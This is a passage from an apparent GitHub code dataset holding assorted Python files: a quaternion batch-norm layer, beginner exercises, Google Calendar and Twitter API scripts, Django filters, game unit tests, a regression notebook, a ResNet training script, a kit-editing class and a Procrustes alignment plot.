torch.no_grad():\r\n self.moving_mean.copy_(moving_average_update(self.moving_mean.data, mu.data, self.momentum))\r\n self.moving_var.copy_(moving_average_update(self.moving_var.data, var.data, self.momentum))\r\n \r\n # print(var, self.moving_var)\r\n\r\n \r\n return new_input\r\n \r\n else:\r\n with torch.no_grad():\r\n # print(input.shape, self.moving_mean.shape)\r\n r,i,j,k = torch.chunk(input, 4, dim=1)\r\n quaternions = [r,i,j,k]\r\n output = []\r\n denominator = torch.sqrt(self.moving_var + self.eps)\r\n beta_components = torch.chunk(self.beta, 4, dim=1)\r\n # print(torch.tensor(quaternions).shape)\r\n # print(quaternions[0].shape, self.moving_mean.shape, self.moving_var.shape, torch.squeeze(self.beta).shape)\r\n for q in range(4):\r\n new_quat = self.gamma * ( (quaternions[q] - self.moving_mean[q]) / denominator ) + beta_components[q]\r\n output.append(new_quat)\r\n output = torch.cat(output, dim=1)\r\n\r\n return output \r\n\r\n def __repr__(self):\r\n return self.__class__.__name__ + '(' \\\r\n + 'num_features=' + str(self.num_features) \\\r\n + ', gamma=' + str(self.gamma.shape) \\\r\n + ', beta=' + str(self.beta.shape) \\\r\n + ', eps=' + str(self.eps.shape) + ')'\r\n \r\n \r\n \r\n \r\n \r\n# class model(torch.nn.Module):\r\n# def __init__(self):\r\n# super(model, self).__init__()\r\n# self.l = torch.nn.Linear(4,4)\r\n# self.b = QuaternionBatchNorm2d(4)\r\n# def forward(self, x):\r\n# return self.b(self.l(x))\r\n# x = torch.ones(2, 4).to('cuda')\r\n# # L = torch.nn.Linear(4,4).to('cuda')(x)\r\n# # # print(model)\r\n# # B = QuaternionBatchNorm2d(4).to('cuda').eval()(L)\r\n# # model = B\r\n# model = model().to('cuda')\r\n# model.eval()\r\n# # print(model.moving_var)\r\n# y = model(x)\r\n# print(y) \r\n\r\n# loss = y - torch.ones(2,4).to('cuda') \r\n\r\n# loss.backward() \r\n ","repo_name":"eleGAN23/QGAN","sub_path":"utils/QBN_Vecchi2.py","file_name":"QBN_Vecchi2.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"37317228785","text":"David_luiz ={'first name':'David','last name':'Theuri','age':18,'city':'Nairobi'}\r\nEugine={'first name':'Eugine','last name':'Kaigai','age':19,'city':'Nanyuki'}\r\nFredy={'first name':'fredrick','last name':'Kangangi','age':20,'city':'Nakuru'}\r\n\r\npeople=[David_luiz,Eugine,Fredy]\r\nfor person in people:\r\n\tprint(person)\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n","repo_name":"Muchiri-cmd/PythonCrashCourse","sub_path":"friendslist.py","file_name":"friendslist.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42030130243","text":"SCOPES = ['https://www.googleapis.com/auth/calendar']\ndef prepare_credentials():\n # 'token.pickle'というファイルに認証結果を保存しておき\n # 認証がすでにされている場合はスキップする、という処理を行なっています。\n import pickle\n import os.path\n from google.oauth2 import service_account\n from google.auth.transport.requests import Request\n creds = None\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n creds = service_account.Credentials.from_service_account_file(\n 'credentials.json', scopes=SCOPES)\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n return creds\n\nfrom googleapiclient.discovery import build\nfrom datetime import datetime, timedelta\n\nCALENDAR_ID = '<<カレンダーID>>'\ncreds = prepare_credentials()\nservice = build('calendar', 'v3', credentials=creds)\n\nevent_start = datetime(2019, 1, 1, 12, 0)\nevent_end = event_start + timedelta(hours=1)\n# 予定の内容を準備します\nevent_body = {\n 'summary': '予定のタイトル',\n 'description': '予定の詳細な説明',\n 'start': {'dateTime': event_start.astimezone().isoformat()},\n 'end': {'dateTime': event_end.astimezone().isoformat()},\n 'location': 'イベントの場所'\n}\n# CALENDAR_IDで指定されるカレンダーに予定を追加します。\nservice.events().insert(calendarId=CALENDAR_ID, body=event_body).execute()\n","repo_name":"shige-horiuchi/auto","sub_path":"Python自動処理sample/chapter11/calendar_insert_event.py","file_name":"calendar_insert_event.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"46350305274","text":"import unittest\nfrom src.war_unit import WarUnit\nfrom src.weapon import Weapon\nfrom src.spell import Spell\nfrom src.hero import Hero\nfrom src.enemy import Enemy\n\n\nclass TestWarUnit(unittest.TestCase):\n def setUp(self):\n self.hero = Hero(health=100, mana=50,\n name=\"Yamamoto\", title=\"Samurai\", mana_regeneration_rate=2)\n self.enemy = Enemy(health=100, mana=100, damage=20)\n\n def test_is_alive(self):\n with self.subTest(\"Test if hero is alive\"):\n self.assertTrue(self.hero.is_alive())\n\n self.hero.health = 0\n\n with self.subTest(\"Test if hero is dead\"):\n self.assertFalse(self.hero.is_alive())\n\n def test_get_health(self):\n self.assertEqual(self.hero.get_health(), 100)\n\n def test_get_mana(self):\n self.assertEqual(self.hero.get_mana(), 50)\n\n def test_take_damage(self):\n with self.subTest(\"Test reduce the hero's health by damage\"):\n self.hero.take_damage(10.5)\n # hero_healyh = self.hero.get_health()\n self.assertEqual(self.hero.get_health(), 89.5)\n\n with self.subTest(\"Test reduce the hero's health to negative value\"):\n self.hero.take_damage(200)\n # hero_healyh = self.hero.get_health()\n self.assertEqual(self.hero.get_health(), 0)\n\n with self.subTest(\"Damage_points is positive\"):\n with self.assertRaises(ValueError):\n self.hero.take_damage(-10)\n\n with self.subTest(\"Damage_points is int or float\"):\n with self.assertRaises(TypeError):\n self.hero.take_damage(\"10.5\")\n\n def test_take_healing(self):\n with self.subTest(\"healing_points is positive\"):\n with self.assertRaises(AssertionError):\n self.hero.take_healing(-10)\n\n with self.subTest(\"Type of healing_points is int or float\"):\n with self.assertRaises(TypeError):\n self.hero.take_healing(\"10\")\n\n with self.subTest(\"Try to heal dead hero\"):\n self.hero.health = 0\n self.assertFalse(self.hero.take_healing(10))\n # back the hero health\n\n self.hero.health = 50\n with self.subTest(\"Try to heal hero with more than the max possible healing_points\"):\n self.hero.take_healing(200)\n self.assertEqual(self.hero.get_health(), self.hero._max_health)\n\n with self.subTest(\"Is the hero's health is max possible health after the last healing - 200 points\"):\n self.assertEqual(self.hero.health, self.hero._max_health)\n\n def test_attack(self):\n weapon = Weapon(name=\"bow\", damage=10)\n spell = Spell(name=\"Fireball\", damage=30, mana_cost=50, cast_range=2)\n gun = Weapon(name=\"gun\", damage=40)\n ice = Spell(name=\"Ice\", damage=50, mana_cost=50, cast_range=1)\n self.hero.equip(weapon)\n self.hero.learn(spell)\n\n with self.subTest(\"Hero attack with spell.damage > weapon.damage\"):\n self.assertEqual(self.hero.attack(), spell.damage)\n\n with self.subTest(\"Hero attack with weapon if hero dont know spell\"):\n self.hero.weapon = None\n self.assertEqual(self.hero.attack(), spell.damage)\n\n with self.subTest(\"Enemy attack with only damage\"):\n self.assertEqual(self.enemy.attack(), self.enemy.damage)\n\n with self.subTest(\"Enemy attack with weapon\"):\n self.enemy.equip(gun)\n self.assertEqual(self.enemy.attack(), gun.damage)\n\n with self.subTest(\"Attack method by weapon\"):\n self.hero.equip(weapon)\n self.assertEqual(self.hero.attack(by=\"weapon\"), 10)\n\n with self.subTest(\"Attack method by spell\"):\n self.assertEqual(self.hero.attack(by=\"spell\"), 30)\n\n with self.subTest(\"Try to attack with non-existent weapon\"):\n self.hero.weapon = None\n self.assertEqual(self.hero.attack(by=\"weapon\"), 0)\n\n with self.subTest(\"Try to attack with spell if hero's mana is lower than the Spell.mana_cost\"):\n with self.assertRaises(ValueError):\n self.hero.attack(by=\"spell\")\n\n def test_take_mana(self):\n self.hero.take_mana(100)\n self.assertEqual(self.hero.mana, 50)\n\n def test_known_as(self):\n self.assertEqual(self.hero.known_as(), \"Yamamoto the Samurai\")\n\n def tearDown(self):\n self.hero = WarUnit(row=0, col=0, health=100, mana=50)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"hatanasov/Dungeons-Pythons","sub_path":"tests/test_war_unit.py","file_name":"test_war_unit.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3402279001","text":"import os\n\nprint(\"Hello world\")\n\ndef tictactoe():\n\tpass\n\ndef menu():\n\n\ta = True\n\n\tos.system('clear')\n\tprint(\"\\n Please make your selection :\")\n\tprint(\"\\n \")\n\tprint(\"\\n 0 : Continue\")\n\tprint(\"\\n 1 : Tic-Tac-Toe\")\n\tprint(\"\\n 2 : Exit\")\n\n\ta = input(\"make your selection\")\n\t\n\tif a ==\"2\":\n\t\tb=False\n\telse:\n\t\tif b == 1:\n\t\t\ttictactoe()\n\n\treturn b\n\n\nflag = True\n\nwhile flag :\n\tflag=menu()\n\t","repo_name":"ravenpuk/pythonTesting","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26683505454","text":"#! /usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport csv\nfrom twython import Twython\n\nimport settings as s\n\ntwitter = Twython(s.APP_KEY, s.APP_SECRET, s.OAUTH_TOKEN, s.OAUTH_TOKEN_SECRET)\ntweets = twitter.search(q='삼성', count=100)\n\nprint(tweets)\n\ndata = [(t['user']['screen_name'], t['text'], t['created_at']) for t in tweets['statuses']]\n\nwith open('tweets.csv', 'w', encoding='utf-8') as f:\n writer = csv.writer(f)\n writer.writerows(data)\n","repo_name":"e9t/courses-code","sub_path":"twitter/get_twitter.py","file_name":"get_twitter.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3044113638","text":"import django_filters\nfrom dal import autocomplete\nfrom django.db.models import Q\nfrom django.utils.translation import gettext_lazy as _\n\nfrom pola.company.models import Company\nfrom pola.filters import CrispyFilterMixin\nfrom pola.product.models import Product\n\nfrom .models import Report\n\n\nclass StatusFilter(django_filters.ChoiceFilter):\n def __init__(self, *args, **kwargs):\n if 'label' not in kwargs:\n kwargs['label'] = _('Status')\n super().__init__(*args, **kwargs)\n self.extra['choices'] = (('', '---------'), ('open', _('Otwarte')), ('resolved', _('Rozpatrzone')))\n\n def filter(self, qs, value):\n if value == 'open':\n return qs.only_open()\n if value == 'resolved':\n return qs.only_resolved()\n return qs\n\n\ndef is_bot_client(queryset, name, value):\n if value:\n return queryset.filter(client='krs-bot')\n else:\n return queryset.filter(~Q(client='krs-bot'))\n\n\nclass ReportFilter(CrispyFilterMixin, django_filters.FilterSet):\n status = StatusFilter()\n product = django_filters.ModelChoiceFilter(\n queryset=Product.objects.all(), widget=autocomplete.ModelSelect2(url='product:product-autocomplete')\n )\n product__company = django_filters.ModelChoiceFilter(\n queryset=Company.objects.all(), widget=autocomplete.ModelSelect2(url='company:company-autocomplete')\n )\n is_bot_client = django_filters.BooleanFilter(\n field_name='client', method=is_bot_client, label='Pokaż zgłoszenia od bota'\n )\n\n o = django_filters.OrderingFilter(\n # tuple-mapping retains order\n fields=(\n ('created', _('Data utowrzenia')),\n ('resolved_at', _('Data rozpatrzenia')),\n ('resolved_by', _('Rozpatrujący')),\n )\n )\n\n class Meta:\n model = Report\n fields = [\n 'status',\n 'product',\n 'product__company',\n 'client',\n 'created',\n 'resolved_at',\n 'resolved_by',\n ]\n","repo_name":"KlubJagiellonski/pola-backend","sub_path":"pola/report/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"77"} +{"seq_id":"21326491446","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 2 12:13:32 2023\r\n\r\n@author: Sai khairnar\r\n\"\"\"\r\nimport pandas as pd\r\n\r\ndataset=pd.read_csv('C:/Users/ABC/Documents/Business_analytics_python/DATA/Real estate.csv')\r\n\r\ndataset.drop([\"No\",],axis=1,inplace=True)\r\ndataset.head(5)\r\n\r\nx=dataset.iloc[:,[0,1,2,3,4,5]]\r\ny=dataset.iloc[:,-1]\r\n \r\n \r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test=train_test_split(x,y,train_size=0.3,random_state=0)\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\nregressor.fit(x_train, y_train)\r\n\r\nregressor.coef_\r\n\r\nregressor.intercept_\r\n\r\ny_pred = regressor.predict(x_test)\r\n\r\nfrom sklearn.metrics import r2_score\r\nr2_score(y_test, y_pred)\r\n\r\nimport statsmodels.api as sm\r\n\r\nimport numpy as nm\r\nx = nm.append(arr = nm.ones((414,1)).astype(int), values=x, axis=1)\r\n\r\nx_opt=x[:, [ 0,1,2,3,4,5,6]]\r\n\r\nregressor_OLS=sm.OLS(endog = y, exog=x_opt).fit()\r\n\r\n#We will use summary() method to get the summary table of all the variables.\r\nregressor_OLS.summary()\r\n#-------------------------------------------------\r\nx_opt=x[:, [ 0,1,2,3,4,5]]\r\n\r\nregressor_OLS=sm.OLS(endog = y, exog=x_opt).fit()\r\n\r\n#We will use summary() method to get the summary table of all the variables.\r\nregressor_OLS.summary()\r\n\r\n\r\ndata_set= pd.read_csv('C:/Users/ABC/Documents/Business_analytics_python/DATA/Real estate.csv') \r\n#Extracting Independent and dependent Variable \r\nx_BE= data_set.iloc[:,[0,1,2,3,4,5]].values\r\ny_BE= data_set.iloc[:,-1].values \r\n# Splitting the dataset into training and test set. \r\nfrom sklearn.model_selection import train_test_split\r\nx_BE_train, x_BE_test, y_BE_train, y_BE_test= train_test_split(x_BE, y_BE, test_size= 0.2, random_state=0)\r\n\r\n#Fitting the MLR model to the training set: \r\nfrom sklearn.linear_model import LinearRegression\r\nregressor= LinearRegression()\r\nregressor.fit(x_BE_train, y_BE_train)\r\n\r\n#Predicting the Test set result;\r\ny_pred= regressor.predict(x_BE_test)\r\n\r\n#Cheking the score \r\n#Calculating the r squared value:\r\nfrom sklearn.metrics import r2_score\r\nr2_score(y_BE_test,y_pred)\r\n#The above score tells that our model is now more accurate with the test dataset with\r\n#accuracy equal to 65%\r\n\r\n#Calculating the coefficients:\r\nprint(regressor.coef_)\r\n\r\n#Calculating the intercept:\r\nprint(regressor.intercept_)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"saikhairnar20023/machine_learning_code","sub_path":"Real estate_regression_backword elimination.py","file_name":"Real estate_regression_backword elimination.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15459878512","text":"#!/usr/bin/env python\n\nimport os\nfrom datetime import datetime\nimport time\nimport tensorflow as tf\nimport numpy as np\nimport resnet\n\n\ntf.app.flags.DEFINE_boolean('is_Server', True, \"\"\"If is for server\"\"\")\ntf.app.flags.DEFINE_boolean('is_Train', True, \"\"\"If is for training\"\"\")\ntf.app.flags.DEFINE_boolean('is_Simple',False,\"\"\"Test on simple model\"\"\")\n# Network Configuration\ntf.app.flags.DEFINE_integer('batch_size', 128, \"\"\"Number of images to process in a batch.\"\"\")\ntf.app.flags.DEFINE_integer('num_gpus', 2, \"\"\"Number of GPUs.\"\"\")\n\n# Optimization Configuration\ntf.app.flags.DEFINE_float('l2_weight', 0.0001, \"\"\"L2 loss weight applied all the weights\"\"\")\ntf.app.flags.DEFINE_float('momentum', 0.9, \"\"\"The momentum of MomentumOptimizer\"\"\")\ntf.app.flags.DEFINE_float('initial_lr', 0.0001, \"\"\"Initial learning rate\"\"\")\n\ntf.app.flags.DEFINE_float('lr_decay', 0.5, \"\"\"Learning rate decay factor\"\"\")\ntf.app.flags.DEFINE_boolean('finetune', False, \"\"\"Whether to finetune.\"\"\")\n\n\ntf.app.flags.DEFINE_integer('dim_output',185,\"\"\"output dimension\"\"\")\n\n# Training Configuration\ntf.app.flags.DEFINE_string('train_dir', './train', \"\"\"Directory where to write log and checkpoint.\"\"\")\ntf.app.flags.DEFINE_integer('max_steps', 300000, \"\"\"Number of batches to run.\"\"\")\ntf.app.flags.DEFINE_integer('display', 10, \"\"\"Number of iterations to display training info.\"\"\")\ntf.app.flags.DEFINE_integer('checkpoint_interval', 10000, \"\"\"Number of iterations to save parameters as a checkpoint\"\"\")\ntf.app.flags.DEFINE_float('gpu_fraction', 0.8, \"\"\"The fraction of GPU memory to be allocated\"\"\")\ntf.app.flags.DEFINE_boolean('log_device_placement', False, \"\"\"Whether to log device placement.\"\"\")\ntf.app.flags.DEFINE_string('basemodel', None, \"\"\"Base model to load paramters\"\"\")\ntf.app.flags.DEFINE_string('checkpoint', None, \"\"\"Model checkpoint to load\"\"\")\n\nFLAGS = tf.app.flags.FLAGS\n\nif(FLAGS.is_Simple==True):\n os.chdir(\"/home/song/Desktop/Code/SS_MultiView_face/\")\nelse:\n if(FLAGS.is_Server==True):\n os.chdir(\"/home/guoxian/Coarse_3DMM/\")\n else:\n os.chdir(\"/media/songguoxian/DATA/UnixFolder/3DMM/Coarse_Dataset/Coarse_Dataset/\")\n\n\ndef get_lr(initial_lr, lr_decay, one_epoch_step, global_step):\n times_= int(global_step/one_epoch_step)\n return initial_lr*pow(lr_decay,times_)\n\n\n\n\ndef train():\n\n def Load():\n if(FLAGS.is_Simple):\n train_data = np.load(\"Input/test_data.npy\")\n train_label = np.load(\"Input/test_label.npy\")\n else:\n train_data = np.load(\"Input/train_data.npy\")\n train_label = np.load(\"Input/train_label.npy\")\n test_data = np.load(\"Input/test_data.npy\")\n test_label = np.load(\"Input/test_label.npy\")\n mean_data = np.load(\"Input/mean_data.npy\")\n mean_label = np.load(\"Input/mean_label.npy\")\n std_label = np.load(\"Input/std_label.npy\")\n\n\n permutation = np.random.permutation(train_data.shape[0])\n train_images=train_data[permutation,:,:,:]\n train_labels=train_label[permutation,:]\n\n return train_images,train_labels,test_data,test_label,mean_data,mean_label,std_label\n\n\n with tf.Graph().as_default():\n init_step = 0\n global_step = tf.Variable(0, trainable=False, name='global_step')\n\n X = tf.placeholder(tf.float32, [None, 224,224,3], name='Input_Images')\n Y = tf.placeholder(tf.float32, [None, FLAGS.dim_output], name='Input_labels')\n\n # Build model\n hp = resnet.HParams(batch_size=FLAGS.batch_size,\n num_gpus=FLAGS.num_gpus,\n num_output=FLAGS.dim_output,\n weight_decay=FLAGS.l2_weight,\n momentum=FLAGS.momentum,\n finetune=FLAGS.finetune)\n\n network_train = resnet.ResNet(hp, X, Y, global_step, name=\"train\")\n network_train.build_model()\n network_train.build_train_op()\n train_summary_op = tf.summary.merge_all() # Summaries(training)\n print('Number of Weights: %d' % network_train._weights)\n print('FLOPs: %d' % network_train._flops)\n\n\n # Build an initialization operation to run below.\n init = tf.global_variables_initializer()\n print(\"sess 0\")\n # Start running operations on the Graph.\n sess = tf.Session(config=tf.ConfigProto(\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=FLAGS.gpu_fraction),\n allow_soft_placement=False,\n # allow_soft_placement=True,\n log_device_placement=FLAGS.log_device_placement))\n print(\"sess 1\")\n sess.run(init)\n print(\"sess done\")\n # Create a saver.\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=2)\n # if FLAGS.checkpoint is not None:\n # print('Load checkpoint %s' % FLAGS.checkpoint)\n # saver.restore(sess, FLAGS.checkpoint)\n # init_step = global_step.eval(session=sess)\n # # elif FLAGS.basemodel:\n # # # Define a different saver to save model checkpoints\n # # print('Load parameters from basemodel %s' % FLAGS.basemodel)\n # # variables = tf.global_variables()\n # # vars_restore = [var for var in variables\n # # if not \"Momentum\" in var.name and\n # # not \"global_step\" in var.name]\n # # saver_restore = tf.train.Saver(vars_restore, max_to_keep=10)\n # # saver_restore.restore(sess, FLAGS.basemodel)\n # else:\n # print('No checkpoint file of basemodel found. Start from the scratch.')\n\n\n if not os.path.exists(FLAGS.train_dir):\n os.mkdir(FLAGS.train_dir)\n summary_writer = tf.summary.FileWriter(os.path.join(FLAGS.train_dir, str(global_step.eval(session=sess))),\n sess.graph)\n\n # Training!\n train_images, train_labels, test_data, test_label, mean_data, mean_label,std_label= Load()\n one_epoch_step =int(len(train_labels)/FLAGS.batch_size)\n train_images = (train_images-mean_data)/255.0\n train_labels = (train_labels-mean_label)/std_label\n\n test_data = (test_data-mean_data)/ 255.0\n test_label= (test_label - mean_label) /std_label\n print(\"data done\")\n for step in range(init_step, FLAGS.max_steps):\n\n offset = (step * FLAGS.batch_size) % (train_labels.shape[0] - FLAGS.batch_size)\n batch_data = train_images[offset:(offset + FLAGS.batch_size), :, :,:]\n batch_labels = train_labels[offset:(offset + FLAGS.batch_size), :]\n # Train\n lr_value = get_lr(FLAGS.initial_lr, FLAGS.lr_decay, one_epoch_step, step)\n start_time = time.time()\n _, loss_value, train_summary_str = \\\n sess.run([network_train.train_op, network_train.loss, train_summary_op],\n feed_dict={network_train.is_train:True, network_train.lr:lr_value,X:batch_data,Y:batch_labels})\n duration = time.time() - start_time\n\n assert not np.isnan(loss_value)\n\n # Display & Summary(training)\n if step % FLAGS.display == 0 or step < 10:\n num_examples_per_step = FLAGS.batch_size * FLAGS.num_gpus\n examples_per_sec = num_examples_per_step / duration\n sec_per_batch = float(duration)\n format_str = ('%s: (Training) step %d, loss=%.4f, lr=%f (%.1f examples/sec; %.3f '\n 'sec/batch)')\n print (format_str % (datetime.now(), step, loss_value, lr_value,\n examples_per_sec, sec_per_batch))\n\n elapse = time.time() - start_time\n time_left = (FLAGS.max_steps - step) * elapse\n print(\"\\tTime left: %02d:%02d:%02d\" %\n (int(time_left / 3600), int(time_left % 3600 / 60), time_left % 60))\n\n summary_writer.add_summary(train_summary_str, step)\n\n # Save the model checkpoint periodically.\n if (step > init_step and step % FLAGS.checkpoint_interval == 0) or (step + 1) == FLAGS.max_steps:\n checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=step)\n\n\n\ndef main(argv=None): # pylint: disable=unused-argument\n train()\n\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"GuoxianSong/SS_MultiView_face","sub_path":"Network/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20118202686","text":"import struct\nfrom .utils import common_functions, rgb_to_hex, hex_to_rgb, zero_fill_right_shift\nfrom .utils.constants import *\n\nclass Kit:\n def __init__(self, data:bytearray):\n \"\"\"\n Se inicializa la clase recibiendo un bytearray y se inicializan los parametros para el kit\n \"\"\"\n self.data = data\n\n @property\n def font_shirt(self):\n \"\"\"\n Carga la configuracion de nombre en la camiseta que tiene por default el kit\n \"\"\"\n return OFF_ON[self.data[54]]\n\n @font_shirt.setter\n def font_shirt(self, new_value:str):\n \"\"\"\n Actualiza la configuracion de nombre en la camiseta en el kit\n \"\"\"\n if new_value not in OFF_ON:\n raise ValueError(\"Value not allowed\")\n self.data[54] = OFF_ON.index(new_value)\n\n @property\n def font_curve(self):\n return FONT_CURVE[self.data[56]]\n\n @font_curve.setter\n def font_curve(self, new_value:int):\n \"\"\"\n \"\"\"\n if new_value not in FONT_CURVE:\n raise ValueError(\"Value not allowed\")\n self.data[56] = FONT_CURVE.index(new_value)\n\n @property\n def front_number(self):\n \"\"\"\n \"\"\"\n return OFF_ON[self.data[58]]\n\n @front_number.setter\n def front_number(self, new_value:int):\n \"\"\"\n \"\"\"\n if new_value not in OFF_ON:\n raise ValueError(\"Value not allowed\")\n self.data[58] = OFF_ON.index(new_value)\n\n @property\n def short_number(self):\n \"\"\"\n \"\"\"\n return OFF_LEFT_RIGHT[self.data[59]]\n\n @short_number.setter\n def short_number(self, new_value:int):\n \"\"\"\n \"\"\"\n if new_value not in OFF_LEFT_RIGHT:\n raise ValueError(\"Value not allowed\")\n self.data[59] = OFF_LEFT_RIGHT.index(new_value)\n\n @property\n def overlay(self):\n \"\"\"\n Carga el overlay que tiene por default el kit\n \"\"\"\n return self.data[61]\n\n @overlay.setter\n def overlay(self, new_value:int):\n \"\"\"\n Actualiza el model en el kit\n \"\"\"\n min_value = 0\n max_value = 14\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[61] = new_value\n else:\n raise ValueError(f\"Overlay must be between {min_value} and {max_value}\")\n\n @property\n def posc_overlay_y(self):\n return self.data[63]\n\n @posc_overlay_y.setter\n def posc_overlay_y(self, new_value:int):\n \"\"\"\n \"\"\"\n min_value = 0\n max_value = 10\n \n if common_functions.check_value(min_value,new_value,max_value):\n self.data[63] = new_value\n else:\n raise ValueError(f\"Overlay y coordinate must be between {min_value} and {max_value}\")\n @property\n def y_posc_num_back(self):\n \"\"\"\n \"\"\"\n return self.data[67]\n\n @y_posc_num_back.setter\n def y_posc_num_back(self, new_value:int):\n \"\"\"\n \"\"\"\n min_value = 0\n max_value = 18\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[67] = new_value\n else:\n raise ValueError(f\"Back number x coordinate must be between {min_value} and {max_value}\")\n\n @property\n def number_size_back(self):\n \"\"\"\n \"\"\"\n return self.data[68]\n\n @number_size_back.setter\n def number_size_back(self, new_value:int):\n \"\"\"\n \"\"\"\n min_value = 0\n max_value = 31\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[68] = new_value\n else:\n raise ValueError(f\"Number size must be between {min_value} and {max_value}\")\n\n @property\n def y_posc_front_num(self):\n \"\"\"\n \"\"\"\n return self.data[69]\n\n @y_posc_front_num.setter\n def y_posc_front_num(self, new_value:int):\n \"\"\"\n \"\"\"\n min_value = 0\n max_value = 29\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[69] = new_value\n else:\n raise ValueError(f\"Front number y coordinate must be between {min_value} and {max_value}\")\n\n @property\n def x_posc_front_num(self):\n \"\"\"\n \"\"\"\n return self.data[70]\n\n @x_posc_front_num.setter\n def x_posc_front_num(self, new_value:int):\n \"\"\"\n \"\"\"\n min_value = 0\n max_value = 29\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[70] = new_value\n else:\n raise ValueError(f\"Front number x coordinate must be between {min_value} and {max_value}\")\n\n @property \n def front_number_size(self):\n \"\"\"\n \"\"\"\n return self.data[71]\n\n @front_number_size.setter\n def front_number_size(self, new_value:int):\n \"\"\"\n \"\"\"\n min_value = 0\n max_value = 22\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[71] = new_value\n else:\n raise ValueError(f\"Front number size must be between {min_value} and {max_value}\")\n\n @property\n def y_posc_short_number(self):\n \"\"\"\n \"\"\"\n return self.data[72]\n\n @y_posc_short_number.setter\n def y_posc_short_number(self, new_value:int):\n \"\"\"\n \"\"\"\n min_value = 0\n max_value = 19\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[72] = new_value\n else:\n raise ValueError(f\"Short number y coordinate must be between {min_value} and {max_value}\")\n \n @property\n def x_posc_short_number(self):\n \"\"\"\n \"\"\"\n return self.data[73]\n\n @x_posc_short_number.setter\n def x_posc_short_number(self, new_value:int):\n \"\"\"\n \"\"\"\n min_value = 0\n max_value = 25\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[73] = new_value\n else:\n raise ValueError(f\"Short number x coordinate must be between {min_value} and {max_value}\")\n\n @property\n def short_number_size(self):\n \"\"\"\n \"\"\"\n return self.data[74]\n\n @short_number_size.setter\n def short_number_size(self, new_value:int):\n \"\"\"\n \"\"\"\n min_value = 0\n max_value = 28 #18\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[74] = new_value\n else:\n raise ValueError(f\"Short size must be between {min_value} and {max_value}\")\n\n @property\n def font_size(self):\n \"\"\"\n \"\"\"\n return self.data[76]\n\n @font_size.setter\n def font_size(self, new_value:int):\n \"\"\"\n \"\"\"\n min_value =0\n max_value = 30\n if common_functions.check_value(min_value,new_value,max_value):\n self.data[76] = new_value\n else:\n raise ValueError(f\"font size must be between {min_value} and {max_value}\")\n\n @property\n def license(self):\n \"\"\"\n Lee y carga en la variable self.license el valor correcto\n \"\"\"\n license = struct.unpack(\" thr:\n plt.plot([xs[i, 0], xt[j, 0]], [xs[i, 1], xt[j, 1]],\n alpha=R[i, j] / mx, **kwargs)\n\n# Points generated using : https://shinao.github.io/PathToPoints/\nv1 = pd.read_csv('brain_points - v1_cortex.csv', header=None)\npole = pd.read_csv('brain_points - temporal_pole.csv', header=None)\n\nR, sc = orthogonal_procrustes(v1.T, pole.T)\n# ot_alignment = OptimalTransportAlignment(reg=.1)\n# ot_alignment.fit(v1.T, pole.T)\n\nfig, ax = plt.subplots(figsize=(10,10))\nplt.plot(pole[0], pole[1], 'og', ms=20)\nplt.plot(v1[0], v1[1], 'og', ms=20)\n# if R has some negative coeffs, plot them too in red\nif not (R >= 0).all():\n _plot2D_samples_mat(v1.values, pole.values, -R, thr=0.1, c=[1, 0.2, 0.2])\n colors = ['blue', 'red']\n lines = [Line2D([0], [0], color=c, linewidth=2) for c in colors]\n# Then plot R positive coeffs above a threshold in blue\n_plot2D_samples_mat(v1.values, pole.values, R, thr=0.1, c=[0.2, 0.2, 1])\nplt.axis('off')\nplt.savefig('lines.png', 